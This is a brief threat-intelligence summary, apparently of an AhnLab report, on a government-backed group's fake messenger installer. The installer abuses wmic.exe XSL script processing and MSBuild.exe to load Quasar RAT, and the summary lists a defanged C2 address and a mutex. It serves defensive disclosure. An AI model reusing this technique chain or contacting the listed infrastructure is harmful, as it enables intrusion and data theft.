AhnLab described malware disguised as a messenger installer and distributed through phishing pages or supply-chain compromise by a government-backed hacking group active in South Korea. The NSIS installer was signed as “Uclick” and had its script modified so the .onInit function launched wmic.exe, abusing the XSL Script Processing technique to fetch a malicious XSL/VBScript payload over FTP from a C2 server. The downloaded script created folders under ProgramData and used XSLT with the legitimate MSBuild.exe process to inject and run Quasar RAT. The RAT configuration included HOSTS 103.125.216[.]106:8080 and mutex LOGCVAT_DINOSAUR_STAR, enabling keylogging, clipboard theft, remote commands, and further post-compromise activity.